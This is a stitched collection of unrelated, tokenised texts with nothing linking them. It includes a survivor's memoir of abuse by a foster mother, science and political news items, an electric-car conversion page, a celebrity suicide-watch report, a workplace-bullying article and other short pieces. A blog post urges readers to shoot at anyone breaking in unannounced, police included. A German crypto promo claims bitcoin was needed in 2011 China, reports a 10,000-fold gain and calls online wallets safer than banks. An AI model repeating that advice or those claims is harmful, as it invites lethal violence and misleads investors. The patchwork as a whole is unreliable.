Then he would put his hands on my legs and move them up my thighs .
One day , he put his hands on my crotch .
" You know , you 're a very attractive girl , " he said in a leering voice , which completely freaked me out .
I had no idea what was going on .
Another time , Kevin sat me on his lap and told me to touch his trousers in the crotch area .
" Go on , " he said .
" I 'll give you a quid if you touch it . "
By " it " I sort of guessed he meant his penis , as I knew men were different .
I was utterly confused and did n't feel right about what was going on between us but I suppose , on some strange level , Kevin provided me with human contact , some kind of touch and warped affection - so starved was I of love and attention after years and years with Eunice .
Later , when I was around 16 , Eunice even seemed to want to encourage Kevin 's behaviour towards me , telling me how much he liked me , as if she were matchmaking .
On one occasion , when we went on a holiday with him , she even made us share a room together , albeit with one of the other children .
I protested , but even then Kevin continued to molest me and indulge in gross indecency in my presence .
I spent literally years trying to convince him that I was n't interested .
When I finally succeeded , he became extremely aggressive and unpleasant .
Compared with all this , something else that Eunice made us do was probably quite benign , although it still makes my stomach churn when I think about it .
She used to make us give her a massage , as though we were her young slaves .
She would lie on the floor or on a sofa and read a women 's magazine and we would have to massage her feet and her back .
It was revolting to have to touch and give pleasure to this woman who hurt us so much .
Also , I found her physically disgusting , and as I was being told to pick the dead skin off her flat feet , or massage her bony shoulders , I would look with fascination at her saggy boobs hanging around her armpits , or her dry wrinkly skin .
Afterwards , we would laugh about it together and mimic her , although very quietly .
It was one of the few times we were united against her .
I 've never really been sure why Eunice took on children after her own two daughters had grown up , but I 'm convinced that part of the reason was that she saw us as a financial meal ticket .
The allowances she was paid for looking after us gave her a good source of income - although she was always after more .
For example , she worked out that if she had us registered as disabled for some reason , she would get more money .
So at different times during our childhoods Eunice campaigned to get me diagnosed as being on the autistic spectrum .
She would be eligible for disability carer 's allowance for each child , if she succeeded .
So it was only a matter of time before Eunice decided , when I was about 12 , that I was a suitable candidate for some " treatment " and I was taken to see a psychologist .
Before I went into the room to meet the doctor , Eunice primed me on how I was to behave , on pain of punishment if I did n't .
I had to pose as if I had Asperger syndrome .
She had done her research carefully and explained I had to be very inarticulate and shut down .
I had to say absolutely nothing if I was spoken to , and not reply if I was asked a question directly .
I had to keep my head down , look at the floor and she would do all the talking .
On this occasion , however , the psychologist smelled a rat .
For some reason , and I do n't know why , the psychologist did not buy into the Asperger 's stunt and sent us home without a prescription .
As I left her office , she said : " I think you 're playing games with me . "
I wanted to burst out laughing .
Eunice was , of course , utterly furious and told me I would be dealt with the minute we got back to the farm .
Once home , and after a thorough beating , Eunice decided to see for herself if I had Asperger or not , and gave me some of the other children 's prescriptions of Ritalin for a week .
From an adult perspective , and as a mother myself now , I believe it was not only incredibly dangerous to give me drugs prescribed for somebody else but also evil and utterly irresponsible because , in doing so , Eunice set me off in a direction which , until then , I did n't know existed .
I got hooked on the drugs - they brought me complete psychological relief from all the isolation , fear and pain that I was experiencing .
Every day I helped myself to her supply , taking around ten or 12 tablets .
Later , I 'd be taking 14 or 16 .
Eunice had hoarded so many pills - I guess she kept getting repeat prescriptions - that she did n't notice her stash was going down .
So I continued to take Ritalin for a long time , probably three years or more .
I have mentioned that we were badly and erratically fed , and as a result were all extremely thin .
Eunice noticed , however , that by the time I was in my teens I enjoyed the fact that I had a slim figure - it made me feel as though I might be attractive .
Since happiness was not allowed , now that I wanted to be thin , she decided maliciously that she had to do something about it .
Eunice had a new eating plan : I was to eat lard .
A whole pound before every meal .
" You need fattening up , " she 'd say .
I had really never eaten anything so revolting in all my life .
Even the rat - poo porridge was not as bad as having to fill my mouth and my system with this stinking , oily , piggy - smelling gunge .
To this day , the smell of sausages cooking still turns my stomach .
By the time I was nearly 17 , I had been enduring Eunice 's hideous regime for a decade and , very gradually , it was beginning to dawn on me that I might be able to make my own way in the world .
I used to take our dog for long walks , which gave me a real taste of freedom .
These stolen moments without being watched helped a new idea crystallise in my mind - scary , but also exciting .
I had reached an emotional and psychological crossroads .
I started to drop enormous hints to Eunice , and she must have got sick of my nagging , because one day she suddenly said : " You 'll be leaving tomorrow , so you 'd better get yourself sorted .
Be ready by nine in the morning - I 'll drive you . "
Without even saying goodbye to the others the next morning , I clambered into the car , wondering where my destiny lay .
" I 'm taking you to Bristol , " Eunice piped up suddenly .
Bristol ?
I knew nothing about Bristol .
Why there ?
" You 'll be in a youth hostel .
I 'll pay your rent for a month . "
Perhaps she hoped that by taking me to a huge city she could ensure I did n't meet anybody I knew and spill the beans , or maybe she thought I 'd be unable to survive and come crawling home again .
Either way , what she did that day when she walked away from the youth hostel was effectively to abandon me .
I had no knowledge of how to survive on my own , no funds , no phone , no list of people to turn to if I needed help .
I had nothing .
The months that followed my release from Eunice could be described as the very steepest of learning curves .
With the help of a charity for homeless people , I found accommodation in various hostels around the city and learned how to apply for both benefits and employment .
Off the leash at last , I caught up on my lost youth in what I now call my " wild time " .
I tried drink and drugs of various kinds and discovered for the first time in my life my ability to attract men of my own sort of age .
This was not a positive experience .
I was , I believe , the victim of an attempted date rape , and I had several other fleeting and unsatisfactory sexual encounters .
By the time I was 18 , I was pregnant by a man I 'd met while working in McDonald's .
The relationship was never going to last more than a few months , and so I became a single mother , living alone with my baby girl in council accommodation at the age of just 19 .
It was very difficult at first .
I had no idea what to do , and although I was still with my baby 's father , he was unsupportive .
Perhaps because I was having such a tough time , one day in August 2004 , when my daughter , Ivy , was three months old , I finally decided it was time to track down my parents , which I did by writing to every address in the road where they used to live to see if anybody knew where they 'd gone .
Our first meeting was very emotional and a bit awkward at the same time .
There was so much to catch up on , and I did n't quite know how much to tell them about what had happened .
They seemed genuinely delighted with their granddaughter , though - my mum kept crying and hugging her and my dad looked pleased as punch .
He told me on later visits that my mother could n't sleep at night for feeling so bad about what had happened to me during all the years we were estranged .
Soon after I re-established contact with my parents I received a huge package from them .
In it were masses of cards : they had gone out and bought a card for every birthday and Christmas that they had missed with me ( to replace all those that they knew Eunice was binning ) , as a way of saying sorry .
Both of my parents had written little notes in the birthday cards , saying things like , ' Happy Birthday , Bright Eyes ' , marking special events like my eighteenth birthday .
They still feel sad that they have missed so much of my life .
After my disastrous relationships , I was in no hurry to start another one .
But I had begun chatting to somebody on the internet who had become a virtual " friend " .
He was very helpful and supportive through difficulties , and eventually we decided to meet .
The attraction was mutual , and we have now been an item for a year .
His name is Sy and he works as a drugs counsellor in Bristol .
He is so thoughtful and kind that I finally told him a bit about life with Eunice - as much as I could bear to talk about - and he was horrified .
And when the ghosts of my past came back to haunt me , Sy was there to support me .
The fact that Eunice was brought to trial is down to the bravery of Sarah , who after years of torment eventually confided in members of Eunice 's Jehovah 's Witness congregation , who encouraged her to go to the police .
Quite rightly , they did n't want people to think that their religion would ever condone such behaviour .
When the police contacted me to ask if I was happy to make a statement to support Sarah 's case , I said I was .
Of course I was .
However , I do n't think the police , or anyone else for that matter , knew what a can of worms they were opening .
Or more like an ocean full of poisonous snakes .
Eunice was arrested in February 2005 , although it took two years before she came to trial .
On March 20 , 2007 , as I was sitting watching Ivy playing with her toys , the phone rang .
" We 've got a conviction . "
The detective constable sounded ecstatic in my ear .
" She 's been found guilty of 26 counts including child cruelty , unlawful wounding and assault . "
A month later , Eunice was sentenced to 14 years in prison .
She 'll be 72 by the time she gets out and Ivy will be 17 - the same age I was when Eunice abandoned me in Bristol .
Now , when I have nightmares about life at the farm , Sy is by my side .
He is a wise , kind man who protects me and makes me feel like I am a good person and worth something .
He is wonderful with Ivy , and we are slowly growing into a family .
A loving , caring , normal family , which is all I ever wanted .
I do n't know what the future will bring but I am hopeful that we will spend it together .
An eye studies a self - contained ecosystem in which every organism feeds on another , or its waste products .
All this sealed globe needs to sustain it is light , so that the plant can produce oxygen .
It is like a mini-Earth .
( ©Maximillian Schneider )
Scientists probing volcanic rocks from deep under the frozen surface of the Arctic Ocean have discovered a special geochemical signature until now found only in the southern hemisphere .
The rocks were dredged from the remote Gakkel Ridge , which lies under 3,000 to 5,000 meters of water ; it is Earth 's most northerly undersea spreading ridge .
The study appears in the May 1 issue of the journal Nature .
The Gakkel extends some 1,800 kilometers beneath the Arctic ice between Greenland and Siberia .
Heavy ice cover prevented scientists from getting at it until the 2001 Arctic Mid-Ocean Ridge Expedition , in which U.S and German ice breakers cooperated .
This produced data showing that the ridge is divided into robust eastern and western volcanic zones , separated by an anomalously deep segment .
That abrupt boundary contains exposed unmelted rock from earth 's mantle , the layer that underlies the planet 's hardened outer shell , or lithosphere .
By studying chemical trace elements and isotope ratios of the elements lead , neodymium , and strontium , the paper 's authors showed that the eastern lavas , closer to Siberia , display a typical northern hemisphere makeup .
However , the western lavas , closer to Greenland , show an isotopic signature called the Dupal anomaly .
The Dupal anomaly , whose origin is intensely debated , is found in the southern Indian and Atlantic oceans , but until now was not known from spreading ridges of the northern hemisphere .
Lead author Steven Goldstein , a geochemist at Columbia University 's Lamont - Doherty Earth Observatory ( LDEO ) , said that this did not suggest the rocks came from the south .
Rather , he said , they might have formed in similar ways .
" It implies that the processes at work in the Indian Ocean might have an analog here , " said Goldstein .
Possible origins debated in the south include upwelling of material from the deep earth near the core , or shallow contamination of southern hemispheric mantle with certain elements during subduction along the edges of the ancient supercontinent of Pangea .
At least in the Arctic , the scientists say they know what happened .
Some 53 million years ago , what are now Eurasia and Greenland began separating , with the Gakkel as the spreading axis .
Part of Eurasia 's " keel " - - a relatively stable layer of mantle pasted under the rigid continent and enriched in certain elements that are also enriched in the continental crust - - got peeled away .
As the spreading continued , the keel material got mixed with " normal " mantle that was depleted in these same elements .
This formed a mixture resembling the Dupal anomaly .
The proof , said Goldstein , is that the chemistry of the western Gakkel lavas appear to be mixtures of " normal " mantle and lavas coming from volcanoes on the Norwegian / Russian island of Spitsbergen .
Although Spitsbergen is an island , it is attached to the Eurasian continent , and its volcanoes are fueled by melted keel material .
" This is unlikely to put an end to the debate about the origin of the southern hemisphere Dupal signature , as there may be other viable explanations for it , " said Goldstein .
" On the other hand , this study nails it in the Arctic .
Moreover , it delineates an important process within Earth 's system , where material associated with the continental lithospheric keel is transported to the deeper convectiing mantle . "
The other authors are based at LDEO ; Harvard University ; Oregon State University ; and the University of Tulsa .
The study was supported by the National Science Foundation .
Copies of the study , " Origin of a ' Southern Hemisphere ' Geochemical Signature in the Arctic Upper Mantle , " may be obtained from Nature , Dr. Goldstein , or the press office at Columbia University 's Earth Institute , of which LDEO is a member .
By Frances Harrison
BBC religious affairs correspondent
Haifa Wehbe has a reputation for wearing revealing clothes A raunchy Lebanese singer is causing controversy in Bahrain , where she is due to perform for the first time .
All but one of the members of the Gulf kingdom 's Islamist - dominated parliament have approved a motion urging the government to ban Haifa Wehbe 's show .
They objected on the grounds that the pop superstar 's performance would be sexually provocative , violating Islamic conventions and Bahrain 's traditions .
Organisers had earlier promised she would dress modestly during the show .
Four years ago , MPs forced the satellite channel MBC to suspend the production of an Arabic version of Big Brother being filmed in Bahrain because it offended " the virtues and traditions of the Arab world " .
' Sexual singer '
Ms Wehbe 's reputation for revealing clothes and sexy performances have not endeared her to Bahrain 's Islamist - dominated parliament .
But she did well in a list of the most desirable women compiled by the website , AskMen.com , and she has featured in People Magazine 's most beautiful list .
I know my fans want me and I am there for them - I am not concerned with the other issues
Haifa Wehbe
Her career began at the age of 16 when she won the title of Miss South Lebanon in a beauty contest .
Ms Wehbe went on to become a runner - up for Miss Lebanon , a top fashion model and to release three albums and make countless TV appearances .
She is famous throughout the Middle East , but still relatively unknown outside the Arab world .
One website said Ms Wehbe 's sex appeal could be measured by the number of prudes she had annoyed .
At one point , newspapers criticised her provocative dancing , saying she moved every possible part of her body including parts that have no muscles in them .
But , for the family concert in Bahrain on Wednesday evening , the organisers had promised the singer would dress modestly .
That was not enough for Bahrain 's parliament which is dominated by MPs who regularly conduct campaigns against entertainment they think is too liberal .
One of the MPs called her a sexual singer who spoke with her body , not her voice .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Starting salaries for software developers , product managers and a range of other professions declined by as much $ 10,000 last month , according to Jobfox , a McLean , Va. - based employment firm .
The average salary for a software developer is currently $ 85,000 , down from $ 95,000 in April , the firm reported .
Similar declines were reported for product managers , networking and system administrators , and government contract administrators .
Last month , the national unemployment rate dipped from 5.1 percent to five percent , though gains in hourly wages remained flat , according to the Labor Department .
" While overall median salaries might be slightly lower in a few professions , keep in mind that many new job openings are filled by professionals who are still getting a personal salary increase to go along with greater responsibilities and opportunities to grow , " Jobfox CEO Rob McGovern said in a statement .
ForkenSwift : an inexpensive , DIY , medium - speed electric car The ForkenSwift is a 1992 Geo Metro converted from gasoline to electric power with used forklift parts ( electric motor , etc. ) , used golf cart batteries ( and a golf cart motor controller ) and a pair of near - dead " host " cars .
It was built by two friends , designed from the outset as a low cost , medium - speed runabout for use in a small , quiet city ( Brockville , Ontario , Canada ) .
This site documents the conversion in detail .
Latest update : 6000 kilometers later : what have we learned ?
Many of the components used in the conversion came from an old forklift : a decomissioned mid-1980 's Baker FTD - 110 ( a 16,600 lb beast ) that we bought , stripped of all its electric / electronic components , and then sold the carcass to a metal recycler .
Since doing this project , now when I see an electric forklift I think , " EV conversion kit in a box ! "
A really , really heavy box .
Some assembly required .
Batteries not included .
( Seriously - it did n't come with the forklift battery , which would have weighed another 3,000 lbs . )
Here 's the loot salvaged from the forklift : Read more ...
The ForkenSwift 's claim to fame is that it was done on a shoestring budget : it was on the road on October 11 , 2007 , legally registered and insured as an electric vehicle , for a net cost of $ 672 including the car .
Since then , that figure has crept up to $ 997.60 ( May 28 , 2009 ) , with some upgrades and additional components bought .
And it may creep up further as we continue tinkering / refining .
How the heck did we manage to do it so inexpensively ?
Read more ...
We 're very grateful to the following bunch of enthusiastic & helpful people and organizations who contributed to the project through inspiration , education , moral support , generous discounts or donations of time & materials .
Read more ...
Three questions Ontario residents often ask : 1 ) anything special required for the safety check / certification ?
2 ) How did you get insurance ;
3 ) How do you change the registration to " electric " to get a Drive Clean emission test exemption ?
Read more ...
It might seem easy to dismiss the low - cost ForkenSwift as an unrealistic one - off , assembled by obsessively cost - conscious builders .
But since it was built , two more affordable , electric runabouts ( their motors also sourced from used forklifts ) have hit the streets .
Which lends proof to the idea that electric drive does not have to be prohibitively expensive for the motivated tinkerer .
Read about them here ...
Jackass Star Steve - O on Suicide Watch
Jackass star , who 's real name , is being held at Cedars - Sinai Medical Center after a threatened suicide attempt .
The 33 - year - old was taken to the emergency room Sunday afternoon after he emailed suicide notes to several friends over the weekend , blaming a broken romance .
He was drug tested and admitted to Thalians Mental Health Center , known for crisis intervention , where he caused a scene and said he wanted to " break every bone in his body on by one . "
Steve was treated for burns that appeared to be self - inflicted , and was put on a 72 - hour hold , which has been extended to 14 days .
According to Star magazine , Steve - O is suffering from untreated bi-polar disorder and is in " extreme mania . "
" His concerned friends and family are hoping he 'll seek treatment .
He does n't need jail , he needs therapy .
We 're just really hoping that this will be the wake - up call that gets him back to himself . "
Kryptowährung was ist das ?
Sie haben viele Namen Bitcoin , Ethereum , Ripple oder wie sie sonst alle heißen .
Dies sind wohl die bekanntesten Kryptowährungen auf dem aktuellen Aktienmarkt , aber wenige wissen eigentlich was es mit den Kryptowährungen auf sich hat .
Sie haben einiges gemeinsam mit dem Geld was wir in unseren Portemonnaies haben naja außer , dass wir diese Kryptowährung wohl nie in unserem Geldbeutel sehen werden .
Bei den Kryptowährungen handelt es sich um digitales Geld welches in einer sogenannten Online - Wallet befindet , diese Online - Wallet ist nichts anderes als ein digitales Portemonnaie .
Kryptowährungen wurden erschaffen um frei von kontrollierenden Finanzinstituten zu sein im Vergleich zu Währungen wie Euro oder Dollar wird die Kryptowährung von einer Gemeinschaft kontrolliert , anstatt von einem Finanzinstitut .
Kaufen des digitalen Goldes
Man muss kein Investmentbanker sein , um zu verstehen das sich die Kryptowährungen in naher Zukunft immer stärker durchsetzen werden .
Die Digitalisierung schreitet stetig voran und macht auch bei Währungen kein halt .
Deshalb ist es wichtig sich frühzeitig mit dem Thema zu beschäftigen .
Wer Kryptowährungen kaufen möchte hat es nicht schwer diese zu erlangen .
Es gibt etliche Online - Wallet von sogenannten Brokern die das einkaufen von Kryptowährungen jedem ermöglichen .
Sie müssen sich lediglich einen Broker Ihrer Wahl aussuchen und bei diesem eine Online - Wallet erstellen .
Anschließend können
Sie schon mit kleinen Investitionen Kryptowährungen kaufen .
Beim Kauf von Kryptowährungen kann man auch Beträge von 0,65 Bitcoins oder 0,22 Bitcoins einkaufen , man ist nicht gezwungen einen hohen Betrag auszugeben .
Kryptowährungen ermöglichen jedem einen schnellen und sicheren Einstieg sein Vermögen zu vermehren .
Sicherheit der Online - Wallet
In China und Japan gibt es diese Online - Wallet schon seit einem Jahrzehnt .
In China begann der Hype um die Bitcoins , wovon einige Personen sehr profitierten .
Hier kann ich aus eigener Erfahrung sprechen denn als ich im Jahre 2011 mit meiner Familie nach China geflogen bin mussten wir uns Bitcoins kaufen um vor Ort zu bezahlen , da in China Kreditkarten nicht gern gesehen sind .
Wir hatten uns die Daten unsere Online - Wallet gemerkt und hatten noch paar Bitcoins übrig welche allerdings in Vergessenheit geraten sind .
Durch eine hohe Leistungsbereitschaft habe ich diese nach über drei Jahren zurückbekommen .
Der ehemalige Einkaufswert lag bei ca. 3 € das Stück verkauft haben wir diese für das 10.000 fache .
Selbst nach drei Jahren war unsere Online - Wallet nicht angerührt worden , was ich damit sagen möchte ist das diese Online - Wallet eine sichere Bank ist , wenn nicht sogar sicherer als die Volksbanken etc. unseres Landes .
Investierung
Foreword
Some six years ago I compiled the first glossary of words , expressions , and the general patois employed by musicians and entertainers in New York ’s teeming Harlem .
That the general public agreed with me is amply evidenced by the fact that the present issue is the sixth edition since 1938 and is the official jive language reference book of the New York Public Library .
“ Jive talk ” is now an everyday part of the English language .
Its usage is now accepted in the movies , on the stage , and in the song products of Tin Pan Alley .
It is reasonable to assume that jive will find new avenues in such hitherto remote places as Australia , the South Pacific , North Africa , China , Italy , France , Sicily , and inevitably Germany and wherever our Armed Forces may serve .
I do n’t want to lend the impression here that the many words contained in this edition are the figments of my imagination .
They were gathered from every conceivable source .
Many first saw the light of printer ’s ink in Billy Rowe ’s widely read column “ The Notebook , ” in the Pittsburgh Courier .
To the many persons who have contributed to this and the other editions , this volume is respectfully and gratefully dedicated .
— Cab Calloway
Police officers mount a no - knock raid , then blame the victims when the shooting starts .
That ’s pretty much how it always happens .
On April 30 , police launched a raid at a suspected crack house on East Rich Street , located on the city ’s east side , 10TV ’s Maureen Kocot reported .
In the course of the forced entry of the residence , where some friends had gathered for something like a “ poker night ” , two police officers received gunshot wounds .
Both will live .
one of the accused gunmen said he believed robbers were breaking into the house — not officers serving a warrant .
This is the obvious result of no - knock raids : confusion over the event of people literally breaking into a home leads the people inside to mistake police officers for robbers .
We ’ll ignore for a moment the fact that in some cases robbers pretend to be police officers , and the fact that in some cases police officers have broken into residences to steal things , and focus on the common case — police officers serve warrants without any reasonable announcement of their identities and presence .
When someone inside gets his or her first hint that someone ’s trying to get in is when that person starts breaking in the door , that person is well within his rights to fire on the intruder .
In fact , doing anything else is just stupid , because sitting around waiting to see if there ’s a badge on the other side of the door is a great way to end up killed in a home invasion .
Maybe , sometimes , there ’s a chance to shout something like “ I have a gun !
Identify yourself ! ”
Most of the time , however , what amounts to combat conditions does n’t exactly allow one the luxury of conversation with an assailant .
“ What I heard was a boom , ” said Derrick Foster .
“ Like somebody was trying to kick in the door . ”
Foster , who played football at Ohio State , told 10TV News that he never heard anyone identify themselves as police officers . ”
The first reaction from everyone inside was we were being robbed , ” Foster said .
“ We ’re being robbed . ”
I ’ve read the article three times .
Nowhere does it say that the police announced their presence with anything other than violence .
That being the case , it ’s no surprise at all that the people inside thought they were being robbed — and , with that understanding of events , their response was entirely justified .
According to Foster , someone else inside the home fired the first shot .
“ Whoever was outside fired back in , and that ’s when I un-holstered my gun and I fired two shots , ” Foster said .
I guess the police in this particular incident had n’t learned their lessons at the academy worth a damn .
See , there ’s this rule police are supposed to follow for how to return fire ; always check your background .
In layman ’s terms , that means that you should always make sure a shot that does n’t hit your intended target has no chance of hitting an innocent bystander .
In this case , whoever fired into the home in response to the shots at the home invaders ( because , in point of fact , a “ home invasion ” is exactly what the police are doing in a no - knock raid ) not only did n’t check his background , but could n’t , because there was no way to see who had even fired at him or her .
In other words , the cop(s ) in question not only did n’t know whether there were any innocent bystanders present , but apparently did n’t give a shit .
“ I ’m more remorseful than any person could ever be .
This is something that has to stick with me for the rest of my life . ”
That should be the cops saying that — not Foster .
Foster is the victim in this case .
Officers Garrison and Gillis did not comment on the pending court case , but said anyone who opens fire on another person needs to be held accountable .
“ I think any person that has a firearm and is willing to shoot at any person is a dangerous person , ” Garrison said .
Tell that to every police officer with a gun , Garrison — and make sure they know you mean them .
What you said is n’t justification for shooting at civilians , nor is it justification for giving civilians reasonable justification for shooting at you then prosecuting them as criminals for it .
Bastards .
If you do n’t want to get shot , stop giving law - abiding citizens any reason to shoot at you .
Edit :
I forgot to mention an interesting fact indicated in the article . . .
It was the third raid of the night for Columbus police .
That suggests some disturbing things to me about how police conduct their business in general .
Brian Martinez points out the ( likely pervasive ) attitude this event suggests the police have toward law - abiding citizens who take the responsibility to defend themselves seriously , in What the police think of gun owners .
Nobody was charged for any crimes ( link via Reason ) after the raid , other than the shootings themselves .
In other words , a raid on a house where nothing was happening that warranted arrest and prosecution led to two men being charged of “ crimes ” of self - defense .
One must wonder what paltry “ evidence ” led the officers to suspect it was a location ripe for a raid .
Advice :
If someone ’s breaking down your door to get into your home , and nobody announces they ’re police , shoot .
Do n’t hesitate , unless you deem it safe to hesitate long enough to announce you ’re armed and demand the people breaking in identify themselves .
Find a safe way to verify their identities before letting them in , though .
You do n’t want to be the victim of a home invasion , dead because you hesitated .
Even if the home invaders are police officers , you could be killed if you do n’t defend yourself .
Being near a gun , just in case they are n’t cops , can get you killed even if they are .
Shooting , however , at least ensures they ’re likely to hesitate in the midst of breaking in long enough for someone to shout “ Police ! ”
Do n’t feel sorry for the police who put you in this position of having to defend yourself in the first place .
They chose this job , then they chose to participate in a no - knock raid .
They chose to put both you and them in danger through these decisions , and you — as the victim — are more entitled to keep your life than they are to keep theirs , under the circumstances .
When it ’s all over , though , remember —
Do n’t talk to the police .
Journey | 360 Degree | Fast Facts | The Team Behind Nano Contest | videos | Picture Gallery | downloads | Geneva Motor Show Forum | Blog | First Impression India | International
Each of the first few numbers was more elaborate than the last , teeming with acrobatic dancers , awash in jewel - toned silks , swelling to the anthemic strains of the orchestra .
It was the opening night of Chinese New Year Splendor , a music and dance production that began at Radio City Music Hall last week .
Then the lyrics to some of the songs , sung in Chinese but translated into English in the program , began referring to “ persecution ” and “ oppression . ”
Each time , almost at the moment a vocalist hit these words , a few audience members collected their belongings and trudged up an aisle toward the exit .
Before long came a ballet piece in which three women were imprisoned by a group of officers , and one was killed .
At the end of the number , more members of the audience , in twos and fours and larger groups , began to walk out .
At intermission , dozens of people , perhaps a few hundred , were leaving .
They had realized that the show was not simply a celebration of the Chinese New Year , but an outreach of Falun Gong , a spiritual practice of calisthenics and meditation that is banned in China .
More than three years after flooding city corners and subway stations to spread the word about the Chinese government ’s repression , Falun Gong practitioners are again trying to publicize their cause .
Only this time , it involves costumed dancers and paying audiences in that most storied of New York concert halls , Radio City .
When Workplace Bullying Goes Too Far Experts say bullying at work is worse for your health than previously thought .
March 10 , 2008  --
" I was like a soldier crouched in a foxhole while the shells were exploding around you , " said Bill Lepowsky , a mathematics and statistics professor at Laney College in Oakland , Calif .
" My world went from ordered , sensible and predictable to a nonsense , ' Alice in Wonderland ' world of insanity , " he said .
Lepowsky 's account is not from a war zone .
It 's from his workplace .
He is one of many who say they have experienced bullying at work .
These experiences have been known to cause stress , depression and suicidal thoughts .
And new research suggests that the effects can be worse than those of sexual harassment .
" Bullying is psychological violence , " said Gary Namie , director of the Workplace Bullying Institute ( WBI ) in Washington , and author of " The Bully at Work . "
" You can take a person 's humanity away from them , " he said .
But even for people not driven to such extremes as suicidal thoughts , the negative impact of bullying is tremendous .
Numerous studies on children have shown that being bullied can lead to low self - esteem and depression .
Fresh analysis of data from 110 studies in the last 21 years tabulating workplace satisfaction and aggression has found that the effects of bullying had more negative effects than being sexually harassed in the workplace .
" That feeling of ostracism , if anyone remembers grade three , is pretty horrible , " said lead study author Sandy Hershcovis , assistant professor of business at the Asper School of Business at the University of Manitoba , Canada .
" It is a feeling of powerlessness .
There is nothing they can do about it . "
Lepowsky discovered this the hard way .
When he reported to his supervisors that a new female administrator was making false , malicious accusations regarding some of his work , she became angry .
Her mistreatment of him turned into threats of termination , eviction from his office at work -- and even led to public defamation by the president of the college .
Hershcovis also found that employees who experience bullying reported more stress , anxiety and depression than their sexually harassed counterparts .
They were also more likely to experience headaches and stomachaches , the pain condition fibromyalgia , generally lower levels of well - being and were less satisfied or left their jobs .
" It 's disparate treatment , but it ignores race and gender , " Namie said .
In fact , a bully is just as likely to be a woman as a man , although targets are more likely to be female .
Bully for You
But bully targets at work are not always the introverted loners of the playground .
They are often bright , social people .
They are well - liked and respected , good at their jobs and typically have a strong sense of ethics and justice .
Part of the reason they are targeted is because they may possess skills that the bully does not have .
Trish Johnson , a 51 - year - old office assistant at a large organization in Winnipeg , Manitoba , who requested that her real name not be revealed , said she has experienced bullying behavior from her direct supervisor for seven years .
" When I want to ask for holidays , I start getting very anxious .
I stew about it .
She literally does a lip curl and goes , 'oh no ... when ? ' "
Johnson said , mimicking her supervisor 's sneering drawl .
" I think it scares her when I take time off , " Johnson said .
" She knows she can't do my job ; she panics . "
Johnson has plenty of support from her department manager and colleagues , but has decided not to pursue any course of action that might cause her direct supervisor to lose her job , especially because she is due to retire soon .
" I do n't know if I could live with the guilt of her losing her job ... a year and a half before her retirement , " Johnson said .
" If I can live through it and just be rid of her , that 's a pretty good alternative , too . "
Fighting the Good Fight
There are other reasons someone in Johnson 's position might want to keep mum .
In general , companies still rely on reporting bullying behavior up a chain of hierarchy .
Data from Hershcovis ' study showed that bullies get angry when their targets attempt to report the problem and tend to step up their behavior , making the situation even worse for the target .
And despite reported increases in defining bullying behavior within standard company protocol , according to the National Human Resources Association , it is hard to punish perpetrators .
" The tactics are not illegal , per se , as far as the EEOC is concerned , " said James Ryan , a spokesman for the U.S. Equal Employment Opportunities Commission .
Unless the target can prove that the bully is behaving in a discriminatory manner , based on race , color , national origin , religious beliefs , sex , disability or age , " I do n't know that there is anybody , federally , that could help them , " Ryan said .
But in addition to the strain of frequent bullying , a target 's stress levels are compounded when they feel they lack the power to do something about the mistreatment .
Bullying evokes the sexual harassment problems of yesteryear , when women in the late 1970s and early 1980s fought for such behavior to be recognized and penalized .
" It is much like the rape and domestic violence myths , " Namie said .
" You say , ' If it 's so bad , why did n't you just get up and leave ? '
Well , because !
We 're much more constrained by circumstance . "
But while the workplace is far from free of sexual harassment , for both men and women , people who experience these problems have more opportunities and clearer resources for reporting wrong behavior than someone who is bullied , because sexual harassment is legally punishable .
In fiscal year 2007 , the EEOC received 12,510 charges of sexual harassment and resolved 11,592 of them .
No such data exist for bullying , and it would not be easy to try to collect figures .
" Knowing that the behavior is wrong and having the ability to voice it ... you can attribute the blame to the perpetrator , " Hershcovis said .
" In terms of aggression , you wonder is it something you 've done that makes you deserving of the aggression . "
State or local laws may be the best avenue when seeking sanctions for a bully .
Namie said 13 states have introduced laws against bullying , but that it will be many years before there is a federal law against it .
Lepowsky , lacking such laws , continued to fight against his bully for almost three years with meticulous documentation , persistence and luck .
He suffered intense stress that affected his health and took away from his job , but eventually , Lepowsky wrangled apologies from the administration .
He is now a resource for others in similar situations .
" It was a wrenching upheaval in what I did and how I did it and what was important in my life , " Lepowsky said .
" She went after a lot of people , but I was certainly the one who suffered the most , and I was the one that fought back the most -- and was victorious . "
The second McCain aide in as many days has left the campaign over ties to a public relations firm that once represented the Burmese junta .
Doug Davenport , one of McCain 's 11 regional campaign managers , quit his post today , a McCain spokeswoman said in response to an inquiry .
" Doug has tendered his resignation and we have accepted it , " Jill Hazelbaker wrote in an e-mail .
She said Davenport quit this morning for the same reason that spurred McCain 's hand - picked convention manager to resign yesterday : connections to the DCI Group .
As reported yesterday by Newsweek , the Republican - heavy PR firm was on retainer for the repressive regime in Burma in 2002 .
Doug Goodyear , who would have been McCain 's man at the St. Paul convention , was the target of Michael Isikoff 's story .
But the report also put immense pressure on Davenport , who had run DCI 's lobbying practice before signing on with McCain last month to run Maryland , Virginia , Delaware , Kentucky and West Virginia for McCain .
" I have long supported John McCain and do not want anything in my past business career - whether properly depicted or not - to distract the Senator 's campaign , " Davenport said in a statement .
[ Updated with Davenport statement ]
comments closed
permalink
WASHINGTON ( Reuters ) - Record U.S. crude oil futures near $ 124 a barrel have reached a “ break point ” that will spur a shift away from an oil - centric transportation sector toward alternatives , energy analyst Daniel Yergin said on Wednesday .
The 2009 Toyota fuel cell hybrid vehicle is shown at the 2008 New York International Auto Show March 19 , 2008 .
REUTERS / Keith Bedford
Yergin , chairman of Cambridge Energy Research Associates , told Reuters that U.S. crude oil prices -- which hit a record $ 123.93 a barrel on Wednesday -- will hasten the adoption of cellulosic biofuels made from switchgrass and woodchips , as well as battery - powered cars and fuels derived from coal .
Crude prices have doubled in a year and risen sixfold since 2002 on rising demand from China and other developing countries , adding pressure to consumer economies already hard hit by a housing and credit crunch .
Yergin countered the notion that global demand for gasoline , jet fuel and other transportation fuels is chiseled in stone because drivers have few current alternatives .
“ Price really matters , ” Yergin said .
“ It does n’t happen overnight but the laws of economics have not been abolished . ”
A sagging U.S. dollar .
DXY that has lost half its value against the euro since 2002 and a 350 percent surge in crude oil contract trading on the New York Mercantile Exchange have been the prime engine behind the oil price rise , Yergin said .
With scant global spare oil production capacity , further dollar weakness could send oil prices to $ 150 a barrel in coming years , he said .
